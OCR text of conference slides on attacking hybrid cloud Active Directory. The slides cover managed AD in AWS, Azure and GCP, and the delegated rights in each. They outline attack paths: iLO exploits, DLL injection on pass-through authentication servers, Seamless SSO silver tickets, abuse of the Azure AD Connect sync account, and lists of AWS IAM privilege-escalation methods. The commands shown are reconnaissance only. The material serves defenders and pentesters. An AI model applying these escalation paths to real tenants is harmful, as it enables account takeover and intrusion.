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ABOUT 


* Founder Trimarc (Trimarc.io), a professional services company that 
helps organizations better secure their Microsoft platform, including 
the Microsoft Cloud and VMWare Infrastructure. 


e Microsoft Certified Master (MCM) Directory Services 
* Microsoft MVP (2017, 2019, & 2020) 


* Speaker: Black Hat, Blue Hat, BSides, DEF CON, DEF CON Cloud Village 
Keynote, DerbyCon, Shakacon, Sp4rkCon 


* Security Consultant / Researcher 


* Active Directory Enthusiast - Own & Operate ADSecurity.org 
(Microsoft platform security info) 
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AGENDA 


° Hybrid Cloud 
° The Cloud & Virtualization 
* Compromising Domain Controllers (On-Prem) 


e Cloud Hosted/Managed Active Directory 
e Amazon AWS 
* Microsoft Azure 
* Google Cloud Platform (GC) 


e Attacking Hybrid Components 
* Cloud Administration (IAM) 


e Compromising On-Prem Domain Controllers Hosted in the Cloud — 
AWS & Azure 


e Conclusion 
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What is Hybrid Cloud? 


* Blend of on-prem infrastructure combined with cloud 
services. 


* Typically on-prem infrastructure with some cloud 
hosted infrastructure (IAAS) and services (SAAS). 


* Connection points between on-prem and cloud often 
don't focus on security. 
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Hybrid Cloud Scenarios 


* On-Prem AD with Office 365 Services (SaaS) 


e Office 365 to host mailboxes with authentication 
performed by Active Directory on-prem. 


* Cloud Datacenter 
e Extending the datacenter to the cloud leveraging Azure 
and/or Amazon AWS (laaS). 


* On-Prem AD with Cloud Hosted AD as Resource Forest 
* Trust between on-prem AD and cloud hosted AD 


* Combination of these (or other) 
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The Cloud & 
Virtualization 
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Conceptually The Cloud is Virtualization (effectively) 


* Cloud provider Infrastructure as a Service (laaS) architecture 
and configuration 


* Amazon AWS architecture to host VMs (instances) which has 
leveraged XEN and more recently (2018) Amazon's Nitro 
(based off KVM core kernel). 


* Azure leverages a customized version of Hyper-V (core) to 
host Azure VMs. 


* Google Cloud Platform (GCP) uses KVM for virtualization. 
* There is a cloud "fabric" that ties the "virtualization" 
component with orchestration (and storage, network, etc). 


Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


Subnet 


docs.microsoft.com i reference-architectures/n-tier/windows-vm 
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Availability Zone 
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ADFSSVC AWS Microsoft AD 


Install AD 
© Administrat 2 
Tools 


© 


AD Administration AD FS Server Azure AD Connect 
Tools Server (Windows Server 2016) Server 


Access Office 365 with AWS Managed Microsoft AD 
https://aws.amazon.com/blogs/security/how-to-enable-your-users-to-access-office-365-with-aws- 


microsoft-active-directory-credentials/ 
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VMWare Cloud on AWS 


Amazon AWS Direct 
vSphere vSAN Redshift Connect Getarin 


https://aws.amazon.com/blogs/apn/diving-deep-on-the-foundational-blocks-of-vmware-cloud-on-aws 
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Compromising 
On-Prem 
Domain Controllers 
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Physical DCs 


* Physical Access 
* Out of Band Management (HP ILO) 


* Check for port 2381 on servers for ILO web service (on same 
network —which is bad) 


Test-NetConnection $IPAddress -Port 2381 
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e A new exploitation technique that allows compromise of the 
host server operating system through DMA. 


Leverage a discovered RCE to exploit an iLO4 feature which 
allows read-write access to the host memory and inject a 
payload in the host Linux kernel. 


Al [ 9 U S * New vulnerability in the web server to flash a new backdoored 
. firmware. 

S e C u [ | ty e The use of the DMA communication channel to execute 
dE , arbitrary commands on the host system. 

| d e nt | fi e d | LO * iLO (4/5) CHIF channel interface opens a new attack surface, 
. exposed to the host (even though iLO is set as disabled). 

S ecurl ty Exploitation of CVE-2018-7078 could allow flashing a 


backdoored firmware from the host through this interface. 


| SSUCS: * We discovered a logic error (CVE-2018-7113) in the kernel 
code responsible for the integrity verification of the userland 
image, which can be exploited to break the chain-of-trust. 
Related to new secure boot feature introduced with iLO5 and 
HPE Gen10 server line. 


* Provide a Go scanner to discover vulnerable servers running 
iLO 
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Virtual DCs: VMWare 


e Compromise VMWare administration 
e Compromise account with VMWare access to Virtual DCs 


* Compromise system running vCenter (Windows system or 
appliance) since this is an administration gateway that 
owns vSphere 


* |dentify VMWare ESXi Root account password and use to 
compromise ESXi hosts 
(similar to local Administrator account on Windows) 


* Connect directly to virtual DCs with the VIX API 
(via VMWare Tools) 
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Virtual DCs: Hyper-V 


e Compromise members of “Hyper-V Admins" group. 
* Compromise server hosting Hyper-V. 


* Compromise local admin account on the Hyper-V 
server (pw may be the same as other servers) 


* Compromise account with GPO modify rights to the 
OU containing Hyper-V servers. 
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Cloud 
Hosted/Managed Active 
Directory 


& What this Means to Pentesters & Red Teams 
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Cloud Hosted/Managed AD 


* AD environment spun up per customer by cloud provider 
e 100% managed AD by the cloud provider 


e Customer does not get Domain Admin rights or access to Domain 
Controllers 


e Amazon AWS, Microsoft Azure, and Google Cloud Platform all have a 
host Managed AD environments for customers, with some differences 
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Directory details 


Directory type 


Microsoft AD 


Edition 
Standard 


Directory ID 


d-9a67273b45 


Directory DNS name 


lab.trimarcrd.com 


Directory NetBIOS name 


LAB 


Description - Edit 


Trimarc RD Lab 


Availability zones 
us-east-2b, 
us-east-2a 


[ ) N S a d d ress 


172.31.14.175, 
172.31.22.253 
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AWS Directory Service for Microsoft Active Directory 


Reset user password | | G 


Status 


Creating 


Last updated 


Monday, July 20, 2020 


Launch time 


Monday, July 20, 2020 


AWS Directory Service for Microsoft Active Directory 


| Active Directory Users and Computers [WIN-JBCPOEDSHJG.lab.trimarcrd.com] | 
| Saved Queries 


w Za lab.trimarcrd.com 


i| AWS Delegated Groups 
i| AWS Reserved 
| Builtin 
j Computers 
3| Domain Controllers 
| ForeignSecurityPrincipals 
wa] LAB 
i| Computers 
3| Users 
| Managed Service Accounts 
| Users 
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AWS Directory Service for Microsoft Active Directory 
e 2 DCs running Windows Server 2012 R2 (172.31.14.175 & 
172.31.22.253) 


e Default domain Administrator account "Administrator" in the 
“AWS Reserved” OU. 


* First account is "Admin" and gains full rights on customer OU 


e Customer OU created and rights delegated to AWS 
Administrators (& default Admin account) 


* The domain password policy is default, but the customer has the 
ability to modify 5 pre-created Fine-grained password policies 

* The DC auditing policy is decent except no Kerberos audit 
policies, so no way to detect Kerberoasting (requires "Audit 
Kerberos Service Ticket Operations" auditing). 
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AWS Managed AD - Customer Admin Account 


PS C:\Users\admin> get-aduser 'admin' -prop description 


Description 


Distinguishedname : 
: True 


Enabled 
GivenName 

Name 
objectclass 
ObjectGUID 
SamAccountName 
SID 

Surname 


UserPrincipalName : 


: DO NOT DELETE: Provided by AwS for administration of directory objects. This account has FULL CONTROL over the root 


OU: 'OU-LAB,DC-lab,DC-trimarcrd,DC-com' and group management rights to groups in AWS Delegated Groups OU 
CN-Admin,OU-Users ,OU-LAB,DC-lab,DC-trimarcrd,DC-com 


: Admin 

: user 

: 1408d957-db4b-4355-a714-9ef099bfc6f0 

: Admin 

: S-1-5-21-299155490-801632954-1140098970-1113 
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AWS Microsoft AD Delegation Groups 


* AWS Delegated Administrators group is delegated most rights including: 
* Group Modify rights on the "AWS Delegated Groups: OU 
* "Reanimate-Tombstones" (effectively the ability to undelete objects) 


* AWS Delegated Managed Service Account Administrators group is 
delegated rights to create and manage MSAs 


* AWS Delegated Add Workstations To Domain Users added to the "Add 
workstations to domain" URA on DC GPO 


* AWS Delegated Kerberos Delegation Administrators added to "Enable 
computer and user accounts to be trusted for delegation" 


* AWS Delegated Replicate Directory Changes Administrators group is 
delegated 'DS-Replication-Get-Changes" at the domain level 


* AWS Delegated Domain Name System Administrators is added to the 
DNSAdmins group providing DNS administration. 


* AWS Delegated Server Administrators group is added to the local 
Administrators on all computers in the customer OU ("LAB") and child 
OUs via the GPO "ServerAdmins". 
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Azure Active Directory Domain Services (Managed AD) 


—| Active Directory Users and Computers [V0Z1INKOUSQOWRLJ.trimarerd.com] 
| Saved Queries 


w Sis trimarcrd.com 


| ASDDC Computers 

| AADOC Users 

| AADDSDormainAdmin 

| AADDSSyncEscrows 

| AADDSSyncState 

| Builtin 

| Computers 

| Domain Controllers 

| ForeignSecurityPrincipals 
| Managed Service Accounts 
| Users 
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Azure AD Directory Services (Managed AD) 


e 2 DCs running Windows Server 2012 R2 (10.0.1.4 & 10.0.1.5) 
e Default domain Administrator account “dcaasadmin” (default location) 


* Initial admin account is Azure AD account - can select Azure AD accounts 
(or synched on-prem AD accounts) 


* Customer OUs: AADDC Computers & AADDC Users 
* 1 Fine-Grained Password Policy (FGPP) called “AADDSSTFPSO” 
e Authenticated Users can add computers to the domain 


* Event auditing on Managed AD Domain Controllers not configured via 
GPO, so can't see configuration. 
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Azure AD DS Delegation Groups 


* AAD DC Administrators has the ability to create new OUs 
(domain) 
* AAD DC Administrators is delegated Full Control on: 
* AADDC Computers 
* AADDSSyncEscrows 
e AADDSSyncState 
e Managed Service Accounts 
* Program Data 


* AAD DC Administrators has Edit Settings rights on the GPOs: 


* AADDC Computers GPO (linked to OUZAADDC 
Computers,DC=trimarcrd,DC=com) 


e AADDC Users GPO (linked to OU=AADDC Users,DC=trimarcrd,DC=com) 


e The GPO AADDC Computers GPO adds AAD DC Administrators to 
the local group Administrators in the following OU AADDC 
Computers 


e AAD DC Service Accounts has 2S$-Reptication-Get-Changes rights 


GCP Managed 
Service for 
Microsoft Active 
Directory 
(Managed 


Microsoft AD) 


Windows Server 2019 Datacenter Edition 
Usage Fee 
Google Compute Engine Costs 


2 x VM instance: 2 vCPUs + 7.5 GB memory $165.64/month 


(n1-standard-2) + 100GB Boot Disk 
- $43.69/month 


$256.27/month 


Basic details 


Domain Name (FQDN) 
lab.trimarcrd.com 


Netbios name 
lab 


Region health 
us-east1 


Labels 
None 


Creation time 
7/28/20, 3:52 PM 


Last update time @ 
7/28/20, 4:28 PM 


© Healthy 
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Network details 


Project 
neon-fort-284318 


Networks 


IP CIDR range 
10.10.23.0/24 


Access details 


Admin name 
trdadmin 


Password 


Ov SET PASSWORD 


GCP Managed Microsoft AD 


| Active Directory Users and Computers [dc8aae75738eabf.lab.trimarcrd.com] 


| Saved Queries 
v ġa lab.trimarcrd.com 
| Builtin 
w (ZI Cloud 
i| Computers 
J| Cloud Service Objects 
j Computers 
i| Domain Controllers 
j ForeignSecurityPrincipals 
| Managed Service Accounts 
j Users 
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GCP Managed Microsoft AD 


e 2 DCs running Windows Server 2019 Datacenter (2012R2 Forest FL) 
e The AD Recycle Bin has not been enabled 

* Default domain Administrator account "Administrator" (disabled) 

e 2nd domain admin account "cloudsvcadmin" 

* First account is customer created ("setupadmin" -can be changed) 


e The domain password policy is default, but the customer has the 
ability to create Fine-grained password policies 


* Event auditing on Managed AD Domain Controllers not configured 
via GPO, so can't see configuration. 
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GCP Managed AD Delegation Groups 
* Cloud Service All Administrators 
* Delegated Full Control on all objects (& link GPO rights) in the Cloud OU 


e Cloud Service Administrators 
* Member of Cloud Service All Administrators & Group Policy Creator Owners 


e Cloud Service Computer Administrators 
* Added to local Administrators group via GPO on Cloud OU 


e Cloud Service Managed Service Account Administrators 
* Delegated Full Control on the Managed Service Accounts OU 


e Cloud Service DNS Administrators 
e Cloud Service Protected Users 
* Cloud Service Group Policy Creator Owners 
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Managed AD Common Themes 


e No customer Domain Admin or Domain Controller rights. 


GEAN OU(s) are provided for customer use (users, computers, groups, 
etc.). 


* Delegation groups provides AD component management capability to 
customer. 


e Domain Password Policy is default (7 characters), with the ability to adjust 
via Fine-Grained Password Policies. 


* Azure AD DS & GCP Managed AD both seem to have default Domain 
Controller GPO settings. 


* All provide the ability to configure an AD trust, so you may see the on-prem 
AD forest trust a Managed AD environment (in the near future). 


* Slightly different (or quite different!) approaches are used to provide the 
same or similar capability. 


AD Security Review PowerShell Script: https://trimarc.co/ADCheckScript 
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Attacking Managed AD 


* Determine which Managed AD you are viewing (combination of OU and 
group names) 


* Likely no escalation to Domain Admins, so focus on delegation groups & 
membership 


* Identify default customer admin account. 


* Azure AD DS can be managed by Azure AD accounts that are synchronized 
into Azure AD DS or even on-prem AD accounts synched in from the on- 
prem Azure AD Connect (through Azure AD) to Azure AD DS. If Password 
Hash Sync (PHS) is enabled, then the on-prem AD account hash is included. 


e Enumerate Managed AD privileged group membership. 


* Managed AD typically used & managed by Application Owners who may not 
realize the rights they do have as members in the Managed AD delegation 
groups. 


° Se auditing may not be configured to detect malicious activity (or sent to 
IEM 
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Attacking 
Hybrid Cloud Components 


Authentication flow and network path 


AD Connector AWS Private Network 


recerves user 
credentials over 


SSL i 


Secure sign-in 2 
page 


4 
AM role 
mapping and 
issuance of 
temporary 
LDAP crederctials 


&Jthenbcabon 


Customer 
192.x 


'aws.amazon.com/blogs/security/how-to-connect-your-on-premises-active-directory-to-aws-using-ad-connector 
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Microsoft Pass-Through Authentication (PTA) 


Office365, SaaS 
and LoB apps 


Ge A | í - > 
ss „mr... Za Za ZG d GZ d GZ ZG GA ZG GZ d d d de, ... | We D Microsoft Azure E > 


ef Active Directory 


» 


User E B "i r Identity synchronization 
SC : € x using Azure AD Connect 


Pass-through 
authentication 
Password validation requests are sent to : 
Windows Server Active Directory on : : 
via Pass-through authentication : EE Windows Server 
` ory N 


Pass-through 
authentication agent 
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Attacking Microsoft PTA 


* Managed by Azure AD Connect 


* Compromise server hosting PTA (typically Azure AD 
Connect server) 


* Azure AD sends the clear-text password (not hashed!) 
to authenticate the user. 


e Inject DLL to compromise credentials used for PTA 


https://blog.xpnsec.com/azuread-connect-for-redteam/ 
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Azure AD Seamless Single Sign-On 


„  Office365, SaaS 
& and Lob apps 


Microsoft Azure 
Active Directory 


User sign-in from AD 


domain-joined machine d EE e 
Contoso Corpnet E ES 
FR ZN at AZE EN 4 Identity synchronization & 
a ie, EE su A fey AR ¥ managed authentication 
3 EU St A ," using Azure AD Connect 
^ Azure AD does Kerberos Authentication S 
against Windows Server Active Directory : 
LIPPE À 
- Jour EK LLL "prosa 
e e PS MZ Eege erg > 
m aa Windows Server 


Active Directory 
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Azure AD Seamless Single Sign-On 


a Azure AD decrypts 

oes £ yt 

Microsoft Azure P» SAM 
Kerberos ticket 


Active Directory 


App 


User redirected 


to Azure AD for," B - = Azure AD 
sign-in SU S wt S S completes the 
e . A A SU sign-in process 
- b Lei SA 3t s* = 
if successful, 5 User tries to ZA S Challenge EA Ka 
user gets ~ om PE app A LETE for Kerberos* DN 
access to app ` d Usgr’enters ze ticket A S 
. ` S username Le ZA fe 
ae KEE d A Browser D gg Windows Server 
V. ite e K E „." forwards ticket A GC Ra Directory 
v0 CS e ZA S to Azure AD A 
RE 2S ` Ba d 
ILE T E VE Wevevccsue — DOE x AD returns 
Domain- E ) 4 : Kerberos ticket 
joined device Si SE MY. CTIDTITUTITOIY Y? 
: User E Request Kerberos 
TREE REE EEE EERE EEEEEE htt Er ticket from AD 


https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso 
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Attacking Azure AD Seamless Single Sign-On 


* Managed by Azure AD Connect 


* "Azure AD exposes a publicly available endpoint that accepts 
Kerberos tickets and translates them into SAML and JWT 
tokens" 


e Compromise the Azure AD Seamless SSO Computer Account 
password hash ("AZUREADSSOACC ") 


* Generate a Silver Ticket for the user you want to 
impersonate and the service 'aadg.windows.net.nsatc.net ' 


* Inject this ticket into the local Kerberos cache 
* Azure AD Seamless SSO computer account password doesn't 
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Attacking Azure AD Connect 


Permissions for the created AD DS account for express settings 


The account created for reading and writing to AD DS have the following permissions when 


created by express settings: 


Permission 


e Replicate Directory Changes 
èe Replicate Directory Changes All 


Read/Write all properties User 
Read/Write all properties iNetOrgPerson 
Read/Write all properties Group 
Read/Write all properties Contact 


Reset password 


DEF CON 25 
(July 2017) 


Password sync E 
DEE > SON 


Import and Exchange hybrid 


Used for 


Import and Exchange hybrid 


Import and Exchange hybrid 


Import and Exchange hybrid 


Preparation for enabling password writeback 


A 


On-Prem: Acme’s Azure AD Connect 


PS C:\> Invoke-ACLScanner -ResolveGUIDs ' 
-ADSpath 'DC-theacme,DC-1o' ` 
| where 1 ($ .IsInherited -eq $False) -AND ` 
($ .ObjectType -like 'DS-Replication?') } ` 
| select ObjectDN,IdentityReference,AccessControlType, ' 
Act1iveDirectoryR1ights ‚ObjectType 


ObjectDN : DC-theacme. DX —10 
IdentityReference : 
AccessControlType : Allow 

ActiveDirectoryRights : ExtendedRight 


ObjectType : DS-Replication-Get-Changes-All 


ObjectDN : DC=theacme, DC=10 
IdentityReference : ACME\MSOL_trd977930921 
AccessControlType : Allow 
ActiveDirectoryRights : ExtendedRight 

ObjectType : DS5-Replication-Get-Changes 
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On-Prem: Acme’s Azure AD Connect 


PS C:\> get-aduser -filter Isamaccountname -like "MSOL*"} 
-prop DistinguishedName,description | fl * 


Description : Account created by the Window irectory Sync 


"trd977930921' running [on computer "AZURESYNC" [configured 1 
"theacme1o.onmicrosoft.COm . 1s account must have directi 
Directory and write permission on certain attributes to eni 


DistinguishedName : CN-MSOL trd977930921,0U-5ervice Accounts ,DC=theacme,DC=10 
Enabled : True 

G1 venName : 

Name : MSOL trd977930921 


PS C:\> get-adcomputer AzureSync 


DistinguishedName :| CN-AZURESYNC ,OU=Servers , DC=theacme,DC=10 


DNSHostName : 

Enabled : True 
Name : AZURESYNC 
Oba erbi lass " computer 
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On-Prem: Acme’s Azure AD Connect 


PS C:\> Find-GPOComputerAdmin -OUName 'OU-Servers,DC-theacme,DC-1o' 


Computer Name ` 

ObjectName : 

Obj ectDN E 

Object5ID ` 

IsGroup : True 

GPODisplayName : Server Baseline Policy 

GPOGuid : 1002404EA-6ACB-495D-97E6-2AECS9ED91A8 | 

GPOPath : \‘\theacme. 10\\SysVol\theacme. 10Po131c1es 1002404EA- 6AC 


GPOType GroupPolicyPreferences 
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On-Prem: Acme’s Azure AD Connect 


, Group Policy Management 
A Forest: theacme.io 


v ga Domains Server Config 
3 theacme.io = 
v Hi Scope Details Settings Delegation 
a, Default Domain Policy 
These groups and users have the specified permission for this GPO 


| Accounts 
| AD Management Groups and users: 
i| Branch Offices Name Allowed Permissions 
; Disabled E Authenticated Users Read from Security Filtering) 
i| Domain Controllers E Domain Admins (ACME\Domain Admins) Edit settings, delete, modify secunty 
Groups H Enterprise Admins (ACME\ Enterprise Admins) Edit settings, delete, modify secunty 
Ww Servers | 42 ENTERPRISE DOMAIN CONTROLLERS Haar 
Xj server Baseline Policy $ $2. Server Tier 1 (ACME Server Tier 1) Edit settings 
„| Server Config E Server Tier 2 (CHE, Server Tier 2) Edit settings 
| Service Accounts H82 Server Tier 3 (ACME\Server Tier 3) Edit settings, delete, modify security 


| Workstations 
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Azure AD Connect Service Account Rights 


* Dirk-jan Mollema (@_dirkjan) covers rights that the Azure AD 
Connect service account has to Azure AD: https://dirkjanm.io/talks/ 
v 


Fun stuff to do with the Sync account 


* Dump all on-premise password hashes (if PHS is enabled) 
* Log in on the Azure portal (since it's a user) 

* Bypass conditional access policies for admin accounts 

* Add credentials to service principals 


* Modify service principals properties 


https://media.defcon.org/DEF9620CON9?62027/DEF9620CON9620279620presentations/DEFCON-27-Dirk-jan-Mollema-Im- 


in-your-cloud-pwning-your-azure-environment.pdf 


Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


Cloud Administration 


Identity Access Management (IAM) 
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Cloud Administration & Roles 


* Administrative groups are called Roles 
* Each role has specifically delegated access. 


* Depending on the cloud provider, custom roles can be 
created with custom delegation and rights. 


* Azure and Amazon AWS each have their own methods 
for this, but the concepts are the same. 


Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


Azure IAM - Role Types 


e Owner 


* Has full access to all resources including the right to 
delegate access to others. 


e Contributor 


* Can create and manage all types of Azure resources but 
can't grant access to others. 


* Reader 
* Can view existing Azure resources. 
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Azure IAM - Privileged Roles 


* Tenant Admins 

* Owner Role on the Tenant 

* Full control over the tenant and all subscriptions 
* Subscription Admin 

* Owner Role on the Subscription 

e Full control over the subscription 
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Differences between Azure roles and Azure AD 
roles 


At a high level, Azure roles control permissions to manage Azure resources, while Azure 
AD roles control permissions to manage Azure Active Directory resources. The following 


table compares some of the differences. 


Azure roles Azure AD roles 

Manage access to Azure resources Manage access to Azure Active Directory 
resources 

Supports custom roles Supports custom roles 

Scope can be specified at multiple levels Scope is at the tenant level 


(management group, subscription, resource 


group, resource) 


Role information can be accessed in Azure Role information can be accessed in Azure 
portal, Azure CLI, Azure PowerShell, Azure admin portal, Microsoft 365 admin center, 
Resource Manager templates, REST API Microsoft Graph, AzureAD PowerShell 


Do Azure roles and Azure AD roles overlap? 


By default, Azure roles and Azure AD roles do not span Azure and Azure AD. However, if 
a Global Administrator elevates their access by choosing the Access management for 


Azure resources switch in the Azure portal, the Global Administrator will be granted the 


User Access Administrator role (an Azure role) on all subscriptions for a particular tenant. 


AWS IAM (Organizations) 


* Root Account (Payer Account) — organization primary account 
(often the first account) 


e Account Admins 


* Full control over the Account and everything in the account (account 
services) 


e If Root Account (admin) AND Account Admin = Full organizational 
control 
* No real "subscription" concept 


* Organizational Unit concept provides granular admin 
to sub AWS accounts which can contain any amount 
of resources and data 
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AWS 


AM Privilege Escalation Methods 


Creating a new policy version (iam:CreatePolicyVersion) 


* This privilege escalation method could allow a user to gain full administrator access of the AWS account. 


Creating an ECH instance with an existing instance profile (iam:PassRole and ec2:RuniInstances ) 


e This attack would give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account. 


Creating a new user access key (iam:CreateAccessKey) 
* This method would give an attacker the same level of permissions as any user they were able to create an access key for, which could range from no privilege escalation to full administrator access to the 
account. 
Create/update new login profile (iam:CreateLoginProfile / iam:UpdateLoginProfile) 


* This method would give an attacker the same level of permissions as any user they were able to create a login profile for, which could range from no privilege escalation to full administrator access to the 
account. 


Attaching a policy to a user (iam:AttachUserPolicy) 


* An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a user, giving them full administrator access to the AWS environment. 


Attaching a policy to a group (iam:AttachGroupPolicy) 


* An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a group, giving them full administrator access to the AWS environment. 


Attaching a policy to a role (iam:AttachRolePolicy) 


* An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a role, giving them full administrator access to the AWS environment. 


Creating/updating an inline policy for a user (iam:PutUserPolicy) 


. Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full 
administrator privileges in the AWS environment. 


Creating/updating an inline policy for a group (iam:PutGroupPolicy) 
. Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full 
administrator privileges in the AWS environment. 
Creating/updating an inline policy for a role (iam:PutRolePolicy) 


. Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full 
administrator privileges in the AWS environment. 


Adding a user to a group (iam:AddUserToGroup) 


e  Theattacker would be able to gain privileges of any existing group in the account, which could range from no privilege escalation to full administrator access to the account. 


Updating the AssumeRolePolicyDocument of a role (iam:UpdateAssumeRolePolicy) 


* This would give the attacker the privileges that are attached to any role in the account, which could range from no privilege escalation to full administrator access to the account. 
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https: 


ithub.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws escalate. 


Cloud API Keys 


* Provide permanent access, often with privileged rights. 


* Often provides additional authentication access method 
(other than username/password) 


* API keys are frequently exposed in code (Github), including 
private repositories. 


* Compromised API keys need to be regenerated. 
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Compromise Cloud 
Hosted DCs 


Via AWS /Federation 


AWS Federated Authentication with Active 
Directory Federation Services (AD FS) 


AWS (Service Provider) 


HH Enterprise (Identity Provider) C. 


Post the SAML assertion 
to sign-in 


IAM Role 
8 | AWS Sign-in 


en — Bd (STS 
5) Temp Credentials din 


AM Policy 


Pe 
MI mmm 


Identity 
Store (AD) 


_6 


Redirected to AWS x e 
Management Console | À 


osuodsaJ INJIH 


(o 
E 
D 
a. 
8 
e 
$ 
x 
- 


(uonJosse INE 


User . = 
authenticated 


ADFS 3.0 


Corporate Data Center 


://aws.amazon.com/blogs/security/aws-federated-authentication-with-active-directory-federation-services-ad-fs 
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On-Prem 
AD 


AWS EC2 
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On-Prem 
AD 
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AWS IAM Role: 
AWS EC2 Administration 


On-Prem On-Prem 
AD AD 
Domain Domain 
Controller Controller 


AWS EC2 


On-Prem 
AD 
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AWS IAM Role: 
AWS EC2 Administration 


On-Prem On-Prem 
AD AD 
Domain Domain 
Controller Controller 


AWS EC2 


Federation 


On-Prem 
AD 


AD Group: 
AWS EC2 Admins 
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AWS IAM Role: 
AWS EC2 Administration 


On-Prem On-Prem 
AD AD 
Domain Domain 
Controller Controller 


AWS EC2 


Federation 


On-Prem 
AD 


AD Group: 
AWS EC2 Admins 
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AWS IAM Role: 
AWS EC2 Administration 


On-Prem On-Prem 
AD AD 
Domain Domain 
Controller Controller 


AWS EC2 


On-Prem 
AD 


AD Group: 
AWS EC2 Admins 


Federation 
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AWS IAM Role: 
AWS EC2 Administration 


On-Prem On-Prem 
AD AD 
Domain Domain 
Controller Controller 


AWS EC2 


On-Prem 
AD 


AD Group: 
AWS EC2 Admins 


Federation 
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AWS IAM Role: 
AWS EC2 Administration 


On-Prem On-Prem 
AD AD 
Domain Domain 
Controller Controller 


AWS EC2 


Federation 


AWS IAM Role: 
On-Prem AWS EC2 Administration 
AD 
AD Group: On-Prem On-Prem 
AWS EC2 Admins AD AD 
Domain Domain 
Controller Controller 


AWS EC2 
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On-Prem AD Account -> AWS Federation -> 
Compromise On-Prem AD Summary 


* On-prem AD Domain Controllers are hosted in AWS EC2 
e On-prem AD groups are added to AWS Roles 


* Compromise on-prem AD user account to compromise AWS EC2 
instances (VMs) to run stuff on DCs 


e Amazon SSM installed by default on most Amazon provided instances 
(template) — need role to execute 


* Ensure that admin groups & roles only contain admin accounts that 
are well protected. 


* Hopefully you are logging this and looking at the logs (CloudTrail) 
And the Logs can’t be deleted. 
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From Azure AD 
to Azure 


An Unanticipated Attack Path 


https://adsecurity.org/?p=4277 


Note that it’s possible that Microsoft has made changes to elements described in 
this section since | performed this research and reported the issue. 
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Differences between Azure roles and Azure AD 
roles 


At a high level, Azure roles control permissions to manage Azure resources, while Azure 
AD roles control permissions to manage Azure Active Directory resources. The following 


table compares some of the differences. 


Azure roles Azure AD roles 

Manage access to Azure resources Manage access to Azure Active Directory 
resources 

Supports custom roles Supports custom roles 

Scope can be specified at multiple levels Scope is at the tenant level 


(management group, subscription, resource 


group, resource) 


Role information can be accessed in Azure Role information can be accessed in Azure 
portal, Azure CLI, Azure PowerShell, Azure admin portal, Microsoft 365 admin center, 
Resource Manager templates, REST API Microsoft Graph, AzureAD PowerShell 


Do Azure roles and Azure AD roles overlap? 


By default, Azure roles and Azure AD roles do not span Azure and Azure AD. However, if 
a Global Administrator elevates their access by choosing the Access management for 


Azure resources switch in the Azure portal, the Global Administrator will be granted the 
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A 


User Access Administrator role (an Azure role) on all subscriptions for a particular tenant. 


Global Administrator / Company Administrator 


Users with this role have access to all administrative features in Azure Active Directory, as 
well as services that use 
The person who signs up for the Azure Active Directory tenant 


becomes a global administrator. Only global administrators can assign other administrator 


roles. There can be more than one global administrator at your company. Global admins 


can reset the password for any user and all other administrators. 


© Note 


In Microsoft Graph API, Azure AD Graph API, and Azure AD PowerShell, this role is 
identified as "Company Administrator". It is "Global Administrator" in the Azure 
portal. 


Global Administrator / Company Administrator 


Users with this role have access to all administrative features in Azure Active Directory, as 
well as services that use Azure Active Directory identities like Microsoft 365 security 
center, Microsoft 365 compliance center, Exchange Online, SharePoint Online, and Skype 


for Business Online. 


The person who signs up for 
the Azure AD organization becomes a global administrator. There can be more than one 
global administrator at your company. Global admins can reset the password for any user 


and all other administrators. 


O Note 


In the Microsoft Graph API and Azure AD PowerShell, this role is identified as 
“Company Administrator". It is "Global Administrator" in the Azure portal. 


TRIMARC R&D 


Home Trimarc R&D - Properties 


Trimarc R&D - Properties 


BO OEE 
Identity Governance 
Application proxy 
Licenses 

Azure AD Connect 
Custom domain names 
Mobility (MDM and MAM) 
Password reset 

Company branding 

User settings 

Properties 


Notifications settings 


Security 


Overview (Preview) 

identity Secure Score 
Conditional Access 

MFA 

Risky users (Users flagged fo.. 


Risky sign-ins 


Directory properties 


EI 


Trimarc R&D 


ntn 
j 


United States 


Location 


United States datacenters 


tficatio 


English 


ID 


1058307b-ab46-4062-ace3-e08267670b92 


Technical « tact 


sean@trimarcsecurity.com 


Global pr acy intact 


private@trimarcsecunty.com 
y 


tatement UI 


/www.trimarcrd.com/privacy 


Access management for Azure resources 


: 


ry. Learn more 
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Access management for Azure resources 


When you set the toggle to Yes, you are assigned the User Access 


Access 
Management 


for Azure 
Resources with this Azure AD directory. This toggle is only available to users who are 


Administrator role in Azure RBAC at root scope (/). This grants you permission 


to assign roles in all Azure subscriptions and management groups associated 


assigned the Global Administrator role in Azure AD. 


When you set the toggle to No, the User Access Administrator role in Azure 
RBAC is removed from your user account. You can no longer assign roles in all 
Azure subscriptions and management groups that are associated with this 
Azure AD directory. You can view and manage only the Azure subscriptions and 


management groups to which you have been granted access. 


Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


How does elevate access work? 


Azure AD and Azure resources are secured independently from one another. That is, Azure 
AD role assignments do not grant access to Azure resources, and Azure role assignments 


do not grant access to Azure AD. 


Use this capability if you don't have access to Azure subscription resources, such 
as virtual machines or storage accounts, and you want to use your Global Administrator 


privilege to gain access to those resources. 


When you elevate your access, you will be assigned the User Access Administrator role in 
Azure at root scope (/). 

. User Access Administrator role 
assignments can be removed using PowerShell. 
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docs.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin 
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Except... 


(D Note 


If you're using Azure AD Privileged Identity Management (PIM), 


deactivating your role assignment does not change this toggle to No. To 


maintain least privileged access, we recommend that you set this toggle to 


No before you deactivate your role assignment. 
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Global Administrator - Elevate Access 


Elevates access for a Global Administrator, 


HTTP 


URI Parameters 


Name In Required Type Description 


E | evate api-version query True string The API version to use for this operation 


Access API 


Responses 


Name Type Description 


